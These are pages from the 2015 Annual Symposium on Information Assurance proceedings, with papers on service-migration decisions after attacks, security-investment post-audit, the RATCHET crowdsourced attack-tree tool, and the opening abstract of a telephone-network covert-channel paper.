The basic notion of service migration is services running on the platforms of a system. Service-oriented architecture [1], [2] has been widely used in various applications. Service migration has been applied for different purposes including service availability, service optimization, security and system survivability. While various techniques have been developed for service/process/task/virtual machine migration ([3-7], to cite a few), the management aspect of service migration about various decision making for an effective and cost efficient

service migration process has not been fully studied. Those management-level decisions (as compared with particular service migration techniques) provide strategic and tactical guidelines regarding when and how to migrate services in a highly dynamic and often uncertain environment in case of a security incident.

In this paper, we present a holistic approach for service migration decisions from a management perspective. The proposed decision models are based on our preliminary work on service migration determination [10], service migration strategy specification [11] and service migration scheduling [12]. Our main contribution in this paper is a holistic approach that integrates those decision components into a comprehensive framework to facilitate an effective and efficient service migration. We first present the overall structure of our approach and then discuss each decision component in more detail.

II. A HOLISTIC APPROACH FOR SERVICE MIGRATION

DECISIONS

As a systematic security approach to defend against

malicious actions and make the system survive devastating

attacks, service migration is a system-wide process and

involves multiple components of a system. As the complexity

of a system and the attacking techniques continuously grow, a

well-planned and ensured service migration is crucial to

minimize any damage resulted from malicious attacks. In this

section, we present our holistic approach for service migration

decisions, which manage and guide the underlying activities

and procedures of a service migration process. As shown in

Fig. 1, our approach includes three decision components: (1)

determining whether a service migration is the most

appropriate course of action to take in case of a malicious

attack; (2) deciding the best strategy for a service migration;

and (3) specifying the effective and most efficient scheduling

for the service migration activities.

Fig. 1. Service migration decision components

A. Belief-based Decision Making for Service Migration

The first and most fundamental decision for a service migration is to determine whether a service migration is the

Service

migration

strategy

Service

migration

determination

Service

migration

scheduling

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 14

most appropriate course of action to take in a security incident, given other security actions including system repair and restoration, system mending and refurbishment, or simply risk acceptance (to name a few). The most appropriate security action is chosen based on the nature of the attack, the damage caused by the attack, and system resources available to defend against the attack and recover from damage. As discussed in [10], service migration is most appropriate in case of a devastating attack, where the attacking effect is so severe that it is difficult to recover the damaged platforms or other system components quickly enough to make the services continuously available without a noticeable interruption to users. Therefore, the best strategy is to migrate those services from their current compromised platforms to other clean, healthy platforms so that those services can be continuously executed on those new platforms. In this way, the critical services are still available even when some platforms of the system have been compromised.

Fig. 2. Belief-based service migration decision model

Making a service migration decision needs to balance between the cost of service migration itself (e.g. suspending current running processes, transferring the data and service programs to new platforms, and setting up the services on the new platforms) and the necessity of migrating services to avoid further loss (e.g. any direct and indirect cost resulted from the compromised platforms) [10]. A fundamental criteria for such a decision is to evaluate whether the platforms of concern have been severely damaged. Assessing the damage status of a platform is not a trivial task given the case that malicious attacks have become increasingly complicated and the available system resources to conduct damage assessment and recovery are often limited in a security incident scenario. Our approach for damage assessment of a platform is to integrate several sources of damage assessment results from multiple independent intrusion detection agents. We have developed a transferable belief-based decision model [10] to represent the damage assessment about a platform from an intrusion detection agent and to combine multiple sources of such assessment outputs into an integrated, more reliable damage assessment result for that platform. As shown in Fig. 2, damage assessment about a platform as provided by an intrusion detection agent is represented as a basic belief assignment, i.e. a belief mass function on the subsets of a belief domain. Belief combination rules are then applied to integrate multiple sources of beliefs to get a comprehensive belief assignment which represents the final damage assessment of that platform. Theoretically, the combined belief assignment represents a probability distribution on all possible combinations of the

damage states of the platform. Given the cost of performing different security actions (e.g. service migration, system repair and restoration, and system mending and refurbishment) on each damage state of the platform, a Bayesian decision model is developed to determine whether a service migration is the most effective and cost efficient action to take. In case the overall cost of service migration is minimum, a decision justifies that service migration is the most appropriate action to take as compared with other security approaches.

B. Fuzzy Inference for Service Migration Strategy

Once a decision for service migration is made, a natural next decision is which strategy to use for the service migration. In our discussion, a service migration strategy is a specification about whether the service programs, the service state and the data space need to move entirely or partially given different security and environment situations. Such a strategy provides a guideline for the underlying service migration activities and procedures to carry out.

A service migration strategy is chosen based on the damage degree of the service programs, the complexity of those service programs, and the available network capability to securely transfer service programs and data to their new platforms. In one situation, if the service programs have been severely damaged, they cannot be executed on the new platforms and therefore should not be moved. Rather, the functionally equivalent programs will be generated on the new platforms in order to continuously execute the services. From a security perspective, any newly generated service programs should be resistant to the same types of attacks occurred on the old platform. This can be achieved through techniques such as code randomization [8], [9]. In a different situation, if the service programs are only damaged with a minor degree or even damage free, they can be readily used on the new platform and hence can be reliably migrated. Regardless whether the service programs are moved or not, the service state and the data space must be saved and moved to the new platform in order for the services to be resumed from wherever has been left on their original platforms. As a general guideline to determine a service migration strategy, only a minimum amount of data and programs should be migrated whenever possible. We have identified the following three service migration strategies [11]:

Heavyweight migration: moving the entire service programs, the service state, and the data space from the current platform to a new platform;

Lightweight migration: only relocating the service state and the data space but not the service programs. Since the service programs are not moved, the system must re-generate the service code on the new platforms so that the service can be continuously provided on those new platforms;

Middleweight migration: moving part of the service programs, along with the service state and the data space to the new platforms and generates the remaining unmoved service program components on the new platforms in order to execute the entire service programs.

Belief combination

from multiple intrusion detection agents about a

platform of concern

Probability distribution on all

possible combinations of the

damage states of the platform

Bayesian decision making

(a set of decisions, a betting

frame, & cost functions)

Cost function

for each security

action

The most cost-effective

security action

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 15

Fig. 3. Components of the Fuzzy Inference System for Service Migration

Strategy

We have developed a fuzzy inference system [11] to

determine a service migration strategy once a service

migration decision is made. Our approach uses expert

knowledge as linguistic reasoning rules and takes service

programs damage assessment, service programs complexity,

and available network capability as input. The fuzzy inference

system specifies the most appropriate service migration

strategy based on expert knowledge and the current system

and environment factors. The fuzzy inference system includes

four components as shown in Fig. 3: (1) a knowledge base

containing a set of fuzzy rules that represent the domain expert

knowledge about the implications of conditions to a service

migration strategy. Each rule is represented in linguistic fuzzy

terms in a format of If-Then statement, indicating the

assumptions and the consequence of a logic implication; (2) a

meta database containing fuzzy variables, fuzzy terms, and the

membership functions of the fuzzy terms; (3) a logic inference

engine for fuzzy logic reasoning taking the crisp values of the

input fuzzy variables and the fuzzy rules. Methods for

condition aggregation, fuzzy rule activation and multi-rule

result accumulation are defined for inference reasoning; and (4)

a fuzzification interface and a defuzzification interface for

input and output values, respectively. Fuzzification determines

the mapping of each input crisp value with the linguistic terms

of the fuzzy variable taking this value. Defuzzification

converts the fuzzy inference result set to a crisp value for each

output variable. Preliminary results show that our fuzzy

inference system is effective in determining the most

appropriate strategy for service migration in a particular

security incident scenario [11].

C. Logic Reasoning for Service Migration Scheduling

The third component of our holistic approach for service

migration decisions is service scheduling/arrangement. This

component is to determine an effective arrangement for each

service to migrate from its compromised platform to a clean,

healthy one. It is to determine which service is to migrate to

which platform given the available system resources and

service functional and security requirements. A service

migration schedule provides a timetable to seamlessly move a

set of services to their corresponding new platforms without

noticeable interruptions to users.

Given the time sensitivity of user services, service

migration scheduling must be conducted as quickly as possible

so that the migration activities can start immediately. In the

meantime, service migration must not violate any constraints

as specified based on service functionalities and system

security. From a service functionality perspective, any

platform to host the migrated services must have the capability

and resources to support the essential functions of those

services. The inherent relationships among the set of services

to be migrated (e.g., dependency, sequencing, or exclusion)

must also be maintained on those new platforms. From a

service quality and user requirement perspective, service

priority, response time, and throughput must be ensured

during and after a service migration. A set of service

migration constraint rules have been defined [12] so that any

valid service migration schedule must follow those rules.

Table 1 shows a summary of those constraint rules, where a

set of services S are scheduled to migrate to a set of platforms

P. Essentially, service migration scheduling is a mapping

from S to P so that the constraint rules are satisfied.

TABLE I. SERVICE MIGRATION CONSTRAINT RULES [12]

Service Migration Constraint Rules

Functional

Constraint

Rules

- Unique platform rule – for Si S, there exists a unique

platform Pj P, s. t., Si is scheduled to migrate to Pj, denoted as Si → Pj. Each resource required by Si to

operate must be provided by Pj.

- Resource constraint rule – for each resource Rk, the total number of the required quantities of Rk by all the m

services scheduled to migrate to Pj must be no more than

the quantity of Rk, which can be provided by Pj, denoted as Nj_k. The following formula must hold for any platform

Pj: Rk. Si. s. t. (Si → Pj) and (

mi

i

kiN1

_) ≤ Nj_k.

Semantic

Constraint

Rules

- All-inclusion rule – For a set of services {Si, Sj, …,

Sk} S that have a strong resource correlation or must be

executed in a tightly coupled fashion, Si, Sj, …, Sk must all

be scheduled to migrate to the same platform.

- All-dependency rule – For Si S that functionally

depends on a set of services {Sm, …, Sn} S, if Si is

scheduled to migrate to a platform Pj P, then Sm, …, Sn

must also be scheduled to migrate to the same platform Pj.

- Selective-dependency rule – For Si S that

functionally depends on the services in one of t sets of

services {L1, L2, …, Lt}, where L1 S, L2 S, …, Lt

S and L1 L2 … Lt = Ø, if Si is scheduled to

migrate to a platform Pj P, then all the services in at least

one Lj (1 j t ) should also be scheduled to migrate to

Pj .

- Exclusion rule – For Si S that has an exclusion

relationship with any service in {Sk, …, St} S, Si must

not be scheduled to migrate to the same platform as any one of those services. This exclusion is due to reasons

such as resource conflicts, function incompatibility, or

control independency.

A logic system has been developed for service migration

scheduling (see [12] for more detail). We have developed a set

of logic constructs (e.g. formulas and predicates) and

inference rules as the essential elements of the logic-based

Service Migration Strategy Fuzzy Inference System

Knowledge Base

Fuzzy rules representing domain

expert knowledge about implications of conditions to

different service migration strategies

Meta Database

Fuzzy variables, fuzzy terms,

and the membership functions

of the fuzzy terms

Logic Inference Engine

Fuzzy logic reasoning taking the

crisp values of the input fuzzy

variables and the fuzzy rules

Fuzzification &

Defuzzification Interfaces

Interfaces for input and output

values

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 16

reasoning system. A logic predicate represents either the

resources required by a service, the resources provided by a

platform, or an arrangement that a service is mapped to a

platform. The inference rules define the core of our logic

reasoning process, i.e. generating a valid service migration

schedule, if one exists, which arranges for each service to

relocate to a platform without violating any of the defined

constraint rules. The service migration constraints themselves

are encoded as logic conditions and implications of the

inference rules. A logic approach is used for service migration

scheduling since it is flexible and easy to define new

constraint rules when more complicated user requirements are

defined. Using a logic approach also provides a more rigorous

method to analyze, evaluate and verify the correctness of the

proposed system.

III. SIMULATIONS AND FUTURE WORK

Most components of the proposed holistic approach have been developed to validate the methodology used. The fuzzy inference system for service migration strategy was implemented using jFuzzyLogic package. A JProlog program was developed for service migration scheduling. Simulation shows that the scheduler program can generate a valid service migration schedule for a reasonable large size of services to be migrated to new platforms in a short time. We have also developed an agent-based system for service migration to illustrate how service agents can manage and coordinate to migrate the services to their new platforms. As an ongoing effort, we are developing a prototype system to integrate all the decision components into a comprehensive service migration decision framework with: (1) fully functional modules to make a service migration decision, determine the most appropriate strategy, and make a valid service migration arrangement based on current system resources and service functional and semantic requirements; and (2) a user-friendly GUI to interact with human users with visualized input and output. Our future work includes formal analysis of the proposed decision models and validation of the prototype system in real case scenarios.

IV. CONCLUSION

In this paper, we present our work-in-progress on a

holistic approach for service migration decisions, including

service migration determination, strategy specification, and

scheduling arrangement. Those decision components represent

a series of decision making processes in managing and

guiding an effective and assured service migration in a

security incident. As a dynamic approach to respond to

malicious attacks, service migration improves system

survivability and service availability by strategically

relocating critical services from their compromised platforms

to other clean, healthy platforms. Our approach provides the

decision terminology and management process for an effective

and efficient service migration.

ACKNOWLEDGMENT

This material is based upon work supported by the US Air Force Office of Scientific Research (AFOSR) under Award FA9550-12-1-0131. Any opinions, findings, and conclusions or recommendations expressed in this publication are those of the author and do not necessarily reflect the views of AFOSR.

REFERENCES

[1] D. Booth, et. al. (editors), “W3C Working Group Note 11: Web Services Architecture”, World Wide Web Consortium (W3C), February 2004, http://www.w3.org/TR/ws-arch/#stakeholder.

[2] T. Erl, “Service-Oriented Architecture: Concepts, Technology, and Design”, Prentice Hall PTR Upper Saddle River, NJ, USA, 2005.

[3] T. Wood, P. Shenoy, A. Venkataramani, and M. Yousif, “Black-Box and Gray-Box Strategies for Virtual Machine Migration,” in Proc. of the 4th USENIX Conference on Networked Systems Design and Implementation, pp. 229–242, 2007.

[4] M. Mishra, A. Das, P. Kulkarni, and A. Sahoo, “Dynamic Resource Management Using Virtual Machine Migrations,” IEEE Communications Magazine, vol. 50, no. 9, pp. 34–40, 2012.

[5] S. Chakravorty, C.Mendes, and L. Kale, “Proactive Fault Tolerance in MPI Applications via Task Migration,” in Proc. of HiPC, 2006.

[6] C. Du, X.-H. Sun, and M. Wu, “Dynamic Scheduling with Process Migration,” in Proc. of IEEE CCGrid, 2007.

[7] C. Clark, K. Fraser, S. Hand, J. Hansem, E. Jul, C. Limpach, I. Pratt, and A. Warfield, “Live Migration of Virtual Machines,” in Proc. of NSDI, 2005.

[8] R. Wartell, V. Mohan, K. Hamlen, K. and Z. Lin, “Binary Stirring: Self-randomizing Instruction Addresses of Legacy x86 Binary Code”, in Proc. of ACM Conference on Computer and Communication Security, 2012.

[9] B. Anckaert, M. Jakubowski, R. Venkatesan, and K. D. Bosschere, “Run-time Randomization to Mitigate Tampering”, in Proc. of 2nd Int. Conf. on Advances in Information and Computer Security, pp. 153–168, 2007.

[10] Y. Zuo, “Belief-based Decision Making for Service Migration”, in Proc. of 48th Annual Hawaii International Conference on System Sciences, pp. 5212-5221, January 5-8, Hawaii, USA, 2015.

[11] Y. Zuo, “Fuzzy Inference for Service Migration Strategy”, in Proc. of IEEE Internaitonal Conference on ElectrInformation Technology, p. 8, DeKalb, IL, USA, 2015.

[12] Y. Zuo and J. Liu, “A logic Approac for Service Migration Scheduling”, in Proc. of 9th Internaitonal Conference on Cyber Warefare and Security, pp. 226–234, West Lafayette, USA, 2014.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 17

Post-audit of Service Security Investment:

Using Simulation Approach

Hemantha S. B. Herath Department of Accounting

Goodman School of Business

Brock University, Ontario, Canada

[email protected]

Tejaswini C. Herath Department of Finance, Operations and Information Systems

Goodman School of Business

Brock University, Ontario, Canada

[email protected]

N important component of Information Security investment management is the post-audit process. Post-audit of capital

investments in IT security is the ex-post assessment of projects to determine whether or not the intended purpose was

accomplished. Bayesian learning and post-audit has immense value since initial forecasts can be revised with sample

information to assess the effectiveness of such investments. The application of the Gamma conjugate family to update

technological parameters for an email intrusion prevention/detection system (IDS) in a real option model have been applied in

a recent article pertaining to information security investment analysis. Often, conjugate priors are difficult to obtain and an

analytically tractable closed form posterior may not be available. A more general approach is to use the MCMC simulation

method which allows obtaining the posterior distribution quite efficiently.

This work was supported in part by the Social Sciences and Humanities Research Council (SSHRC) of Canada under (Grant no:

410-2009-1398) and (Grant no: 410-2010-1848). The authors acknowledge the research funding support from IIIA (Grant 336-332-033).

A

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 18

Crowdsourcing Computer Security Attack Trees

Matthew Tentilucci1, Nick Roberts1, Shreshth Kandari1, Daryl Johnson1

Dan Bogaard1, Bill Stackpole1, and George Markowsky21Department of Computing Security, Rochester Institute of Technology, Rochester, NY

2School of Computing and Information Science, University of Maine, Orono, ME

Abstract—This paper describes an open-source project calledRATCHET whose goal is to create software that can be usedby large groups of people to construct attack trees. The valueof an attack tree increases when the attack tree explores morescenarios. Crowdsourcing an attack tree reduces the possibilitythat some options might be overlooked. RATCHET has beentested in classroom settings with positive results. This paper givesan overview of RATCHET and describes some of the features thatwe plan to add.

Keywords—crowdsourcing, attack tree, security, attack surface

I. INTRODUCTION

Attack tree analysis, as described by Brue Schneier in thebook Secrets and Lies [1], is the process of analyzing howsystems fail. Attack trees allow users to understand possiblethreats against systems, visualize those threats and assignvarious metrics to determine which threats are most likelyto occur. Fault tree analysis (FTA), similar to attack treeanalysis, has been used since the early 1960s to perform safetyand reliability evaluations in high-hazard industries includingoriginally the U.S. Air Force Ballistic Systems Division [2].While attack tree analysis and fault tree analysis are used ininformation technology and industrial engineering respectively,the two methods have much in common.

Crowdsourcing is the process of harnessing the contri-butions of a community of online users to supply services,concepts, or content. Participants bring a rich background ofexperience, perspective, and expertise to the problem.

Attack tree analysis is difficult to perform well as thevolume of detail that must be collected and collated to build auseful tree is large and continually growing. This project com-bines the ability of attack tree analysis to describe computersecurity threats with the power of crowdsourcing to createall-encompassing, open source, and community created andmaintained computer security attack trees.

There are several incentives to combine attack tree analysisand crowdsourcing. These include visualization of securitythreats, improved security, and quantification of security ef-forts. Benefits to the computer security community can only berealized if attack trees are sufficiently comprehensive to allowthem to address credible threats to a computer system. Thesemay include vulnerabilities for software and services, multi-step attacks, social engineering, physical security, networkdevice security, etc. The number of attack vectors is toolarge for a typical organization to understand all of them.Crowdsourcing can address this problem by distributing theeffort required to build a complete tree. Collaboratively built

Fig. 1. Starting the Attack Tree

attack trees can be more complete and accurate, increasingpotential benefits to computing security.

Over the past year a team of faculty and students have im-plemented a web-based system to allow an online communityof users to create attack trees viewable to the general public.The online community has the ability to promote better ideas,voting down the ones perceived as less valuable. RATCHETcan found at http://ratchet.csec.rit.edu/. RATCHET permitspeople to visualize attack trees, share branches, and vote onrelevant information. RATCHET also provides a node by nodedescription.

RATCHET combines attack tree analysis with the powerof crowdsourcing to create an all encompassing, open source,community created and maintained attack tree system. Thereare a number of reasons to combine attack tree analysis andcrowdsourcing. These include visualization of security threats,improved security, and quantification of security efforts. Thebenefits to the computer security community afforded by attacktrees can only be realized to their fullest if the attack treescreated address the most relevant security threats to a system.Given the number of possible attacks, attempting to generateattack trees for all possible attacks is a task too large forsmall to medium sized organizations. We believe that attacktrees created by crowdsourcing will be more complete and willincrease the likelihood that major benefits will be realized.

II. RELATED WORK

References [3]–[5] illustrate the advantages of using attacktree analysis and fault tree analysis to model security threats.Zhang et al. [6] show how to supplement fault tree analysismodels by adding privilege escalation metrics into the models.Edge et al. [7] introduce the idea of expanding the attacktree concept into a protection tree. They first create an attacktree, calculate the appropriate metrics, and then they create a

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 19

Fig. 2. The Second Attack Tree

Fig. 3. The Second Attack Tree With Cost Information

protection tree to help planners allocate resources to defendagainst specific attacks. Roy et al. [10] take the idea ofprotection trees a step further, proposing attack countermea-sure trees where qualitative metrics, defense mechanisms, andprobabilistic analysis can be applied to nodes directly withinthe tree. Bauer [8] discusses scenarios that can be turned intoattack trees.

Of special interest is an open-source project called Seamon-ster [9]. Seamonster is a program designed to produce standalone attack trees. We will have more to say about Seamonsterlater in this paper.

III. PROJECT GOALS

The goals for this project include: 1) Exploring attack treeanalysis and its use in quantifying computer security vulner-abilities and efforts; 2) Creating an attack tree platform that

would be community created, maintained, and utilized (e.g.crowdsourced); 3) Implementing features that will facilitate thegrowth of a new online community focused on the creation ofcomputer security themed attack trees.

Our goal is to have people and organizations useRATCHET to build attack trees specific to their infrastructureand needs, and to share them with others. We expect that theattack trees produced and shared in this manner will greatlybenefit the entire Information Technology (IT) community,There currently exists no definitive information source or toolfor computer security engineers to use for guidance whenadding new devices or services to a network. With attacktree analysis, determining points of failure or faults in currentnetwork configurations when introducing new hosts or servicesinto an infrastructure would be more easily performed.

It is also possible that a cost and likelihood could be asso-ciated with each attack or vulnerability. With this information,an IT shop might apply a score to their computer securityefforts. Such a score could be used as a metric against whichto judge whether one is improving one’s defenses. Metricsmight be used to justify the cost of new devices or services,or to validate the need for a configuration change. Utilizing anattack tree can provide computer security professionals withaccess to measurable data and help them evaluate the value ofadding a new security system or software patch.

IV. ORIGINAL VISION

A basic attack tree would be focused around a centralroot node or objective. Such an objective might be to obtaina users password. Branching off of a root node, one couldcreate multiple methods to obtain customer data. Fig. 1 showsan example of how one might start an attack tree. The nextstep might explore what methods one would use to searchfor a written copy of the password, bribe the user for his orher password, or utlize a keylogger to steal the password. Atthis stage, a new community of researchers, IT professionals,pentesters, or security minded individuals become a vital partof the process. For example, one individual might know howto burglarize an office, but not how to exploit a system andinstall a keylogger. Working together, a group is more likely tocreate a detailed attack tree using different methods of reachingthe same goal than would the individuals working alone. Anexample is shown in Fig. 2.

By using attack trees, organizations can determine whereto focus their efforts in order to minimize potential threats.Attack trees that include associated costs, such as the attacktree in Fig. 3, are extremely useful. The attack tree in Fig.3 can help determine which attacks might be preferred by anattacker who would carry out a low-cost attack.

Price-points may be one method to analyze the value of agiven problem, but the cost between organizations might varybased on any number of unrelated factors. Some organizationsare less cost-conscious than others. This realization led to aconcept that information might need to be assigned differentlevels of visibility with some of it being global and otheritems visible only to a particular user. Different attack methodsmight be displayed with orientation attributes related to differ-ent participants-user-oriented vs server-oriented for example.Some attributes that might be of use in analysing cyber attacks

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 20

Fig. 4. A More Elaborate Attack Tree

are presented in Table 1. A more elaborate attack tree is shownin Fig. 4.

V. RATCHET

RATCHET is a prototype of a system that can leveragecrowdsourcing for the development of attack trees. Web appli-cations provide a very convenient way to reach a lot of people.If properly designed they require only access to a browserwhich most computer users have. Fig. 5 shows the home pageof RATCHET.

The researchers and students involved in this project allcollaborated in gathering ideas for what the system shouldaccomplish, how it might be used and what issues it mightface. The application was designed for a collaborative audienceof users who would have sufficient knowledge and the abilityto help the system grow. The system can handle both simpleattack trees, e.g., a password attack, and complex attack trees,e.g., attacking an operating system.

RATCHET has the ability to allow users to build a new tree,node by node. Every node in the tree has an area for commentsand the capability of allowing users to vote in favor or against

it. Any node of any tree can be duplicated and attached toany other node either within the same tree or in completely

Fig. 5. RATCHET Homepage

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 21

TABLE I. EXAMPLE ATTRIBUTES FOR ATTACK TREE ANALYSIS

Attribute ScaleCost DollarsDifficulty Easy vs ChallengingPhysical Presence Required Intrusive vs Non-IntrusiveProbability Possible vs ImpossibleSpecial Equipment(Resources) Required Availability & Traceability

Risk of Detection Evidence Left Behind orStealthiness

Skill Level Required Novice or Expert

different trees. Each attack tree is displayed visually usingScalable Vector Graphics (SVG - an HTML5 technology thatnatively allows for dynamically drawing within a web page[11]). The users have the ability to zoom, pan or select anyof the created nodes, view the comments and add their ownideas, vote on its relevance, or add a new child node of theirown.

We hope to make many improvements to RATCHET basedoff feedback we have received thus far. Some suggestions wehave been thinking about include the ability to work offline,limiting specific trees or nodes to a subset of logged in usersand the addition of analysis tools. It would also be goodfor RATCHET to allow batch uploading of entire trees. Thismight be done by supplying the user with a JSON (JavaScriptObject Notation) format and once the correctly formatted fileis uploaded, the system would parse the file and install thetree.

VI. CLASSROOM FEEDBACK

During the Spring semester of 2014, Professors Stackpoleand Johnson taught a class titled Penetration Testing Method-ologies where they hosted an exercise of the RATCHET sys-tem. The goal of this class is to provide students with a realistic

Fig. 6. A Simple Attack Tree in RATCHET

experience with tools, techniques, and goals that face a typicalpenetration tester or ethical hacker. Students are introduced tothe offensive side with items such as Open Source Intelligence(OSINT), scanning, penetration testing framework and col-laboration tools, stepping stones, and password cracking. Onthe defensive side, items such as firewalls, Intrusion DetectionSystems (IDS), Intrusion Prevention Systems (IPS), antivirus,software updates, and the like are introduced.

Attack trees were presented as a tool for organizing apenetration testing exercise. The concept of attack trees wasraised as the topic for an initial discussion with students. Ashort training session on how to use RATCHET was presented.Students were broken into four teams with six students perteam. Each team was instructed to address two goals: onegoal specified the target as an operating system, and theother addressed the exploitation of an application. Each teamwas instructed to perform a pre-event survey capturing theirpreconceived notions and opinions on the use and value ofattack trees. The class was given a half hour introduction andRATCHET system and its use. Each team was to conceptualizean attack tree to reach their stated goals and to input theirattack tree elements into the RATCHET system.

Each team was tasked with reviewing the attack treescreated by two other teams, adding content where appropriate,and reviewing the work submitted by their peer teams. Thestudent teams were tasked with using their Attack Trees inperforming an attack on a specific target in the SecurityLab. Finally the students were asked to provide feedback onthe experience of designing their own tree specific to theRATCHET implementation through another survey instrument.This exercise spanned approximately 3 weeks of the course.

From this exercise, several changes were made to theRATCHET system mainly revolving around the interface de-sign. The ability to change the focus of the tree and how toindicate the node on the screen that commands or instructionsapply to was enhanced. It was noticed that students did notimmediately build or create the attack tree in RATCHET, theybuilt it first on a whiteboard then transposed it to RATCHET.The feedback from students indicates that “In an unfamiliarenvironment that which is familiar is attractive.”

Several issue arose from this exercise that were addressedsuch as trouble with creating trees, adding new nodes, andvoting. While these issues did not stop the exercise they didlimit the amount of work that the students could accomplish.As such the exercise was helpful for the developers andenlightening for the students, but the results were of mixedvalue and will not be included in this paper. Professors Johnsonand Stackpole plan to use this exercise in future classes.

In Fall 2014, Professor Markowsky taught a similar coursein cybersecurity at the University of Maine that included attacktrees as one of the topics studied. Students were encouragedto draw attack trees manually, to use Seamonster [9] and touse RATCHET. Informal feedback was solicited. As might beexpected, the manual approach was the easiest approach tostart with. It was clear that there were advantages to generatingattack trees on the computer since they generally looked betterand were easier to share. Seamonster was easy to use, butdid support crowdsourcing. Some people thought RATCHETwas more complicated to use than Seamonster, but just about

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 22

everyone agreed that RATCHET produced the best lookingtrees. Many students did not like the fact that they were unableto delete nodes once they were created.

In the original design of RATCHET it was decided thatusers could not delete nodes and that voting would be theway nodes were promoted or demoted. We did not want someuser to just delete a tree that many other people had workedon. It was clear that in creating attack trees there would beoccasional false steps that users wanted to remove from thetree and they became frustrated by not being able to do so. Weplan to explore ways to enable users to delete nodes in limitedsituations This might take the form of enabling deletion justof nodes created by the user within a single editing session orallowing users to delete nodes that they created but have notbeen used by anyone working on the attack tree.

VII. FUTUREWORK

We have discussed some of the improvements we hopeto implement in RATCHET. In addition to the items alreadymentioned, there are some other tasks that we would liketo complete. First, we would like to construct a library ofcommonly needed sub-trees that could be copied into a tree un-der construction to speed up development. Second, we wouldlike to augment the current attribute feature to handle richerstructured characteristics such as arrays, tables, or documents.Third, we would like to augment the voting feature to allowvoting on the attributes individually.

It addition, we would like to add functions to RATCHETthat can perform various analyses of attack trees such as criticalpath or least cost analysis. Finally, we hope to develop an ap-plication program interface (API) to support the developmentof external tools to utilize RATCHET.

VIII. CONCLUSIONS

Compared to other well established field of study such asengineering and chemistry, computing security is still in itsinfancy. As in the beginning of those other fields, methods,language, and measurements had to be discovered, developed,and generally accepted. The ability to record, exchange, andcompare the security state of an environment or situation isnecessary in order for the field to progress beyond an art. Webelieve that attack trees can be used to document, describe,and measure complex, multivariable, and situationally sensitiveenvironments such as the ones found in computing security.

We hope that the impact of attack tree software on thefield on computing security will be similar to the impactof electronic spreadsheet programs such as Lotus 1-2-3 orVisiCalc [12]. Just as spreadsheets permit business peopleto easily do “What if?” scenarios, attack trees can providecybersecurity people the opportunity to experiment with “Whatif?” scenarios. Examples of the sort of questions peoplecould ask are: “What if I replaced one firewall product withanother?”, “What if the Exchange mail server is replaced by theExim mail server?”, “What if remote management is enabledin a particular networking device?”. In general, these and otherscenarios could be explored quickly and cheaply.

The research and development efforts so far have demon-strated that attack trees can be constructed through the work of

a community. The ability of attack trees to record and commu-nicate the attack surface of an operating system, service, andsituation has been demonstrated. It has also been demonstratedthat attack trees can be shared and assembled to build largeand complete attack trees. We look forward to continuing thedevelopment of RATCHET and we welcome feedback fromthe IT community.

REFERENCES

[1] B. Schneier, Secrets and lies: digital security in a networked world: withnew information about post-9/11 securit. Indianapolis, Ind.: Wiley, 2004.

[2] C. Ericson, “Fault Tree Analysis - History” Proc. 17th Int. Syst. SafteyConf., 1999.

[3] P. J. Brooke and R. F. Paige, “Fault trees for security system design andanalysis,” Comput. Secur., vol. 22, no. 3, pp. 256-264, 2003.

[4] J. B. Odubiyi and C. W. OBrien, “Information security attack treemodeling,” Pract. Exp. Approaches Inf. Secur. Educ., pp. 29-37, 2006.

[5] J. L. Bayuk, CISA, and CISM, Stepping Through the InfoSec Program,1st edition. Rolling Meadows, IL: Isaca, 2007.

[6] T. Zhang, M. Hu, X. Yun, and Y. Zhang, “Computer vulnerabilityevaluation using fault tree analysis,” Information Security Practice andExperience, Springer, 2005, pp. 302-313.

[7] K. S. Edge, G. C. Dalton, R. A. Raines, and R. F. Mills, “Usingattack and protection trees to analyze threats and defenses to homelandsecurity,” Military Communications Conference, 2006. MILCOM 2006.IEEE, 2006, pp. 1-7.

[8] M. Bauer, Linux Server Security. OReilly Media, Inc., 2005.[9] Seamonster - Security Modeling Software, Sourceforge Project, http://

sourceforge.net/projects/seamonster/.[10] A. Roy, D. S. Kim, and K. S. Trivedi, “Cyber security analysis using

attack countermeasure trees,” Proceedings of the Sixth Annual Workshopon Cyber Security and Information Intelligence Research, 2010, articleno. 28, pp. 28-1-28.4.

[11] “W3C.” SVG Working Group. N.p., n.d. Web. 30 Oct. 2014.[12] P. Cunningham and F. Frschl, Electronic Business Revolution: Opportu-

nities and Challenges in the 21st Century. Springer Science & BusinessMedia, 1999.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 23

A Covert Channel in the Worldwide PublicSwitched Telephone Network Dial Plan

Bryan Harmat, Jared Stroud, and Daryl JohnsonDepartment of Computing SecurityRochester Institute of Technology

Rochester, NY 14623Email: {bjh7242, jxs1261, daryl.johnson}@rit.edu

Abstract—The worldwide dial plan proposed by the Interna-tional Telecommunication Union recommendation E.164 reservesmultiple country codes for future use. These unused codes presentan opportunity for a potential covert channel over the publicswitched telephone network utilizing a spoofed source phonenumber of a call to send information to a mobile device. Thereserved country codes can act as a delimiter indicating that asecret message is being sent. By spoofing a call using a reservedcountry code number, the application listening on the mobiledevice will be able to intercept the call and extract informationfrom the remaining digits based on ASCII encoding in a decimalformat. The purpose of using a reserved country code numberis so that there will be no denied service to the user with a callfrom a legitimate phone number.

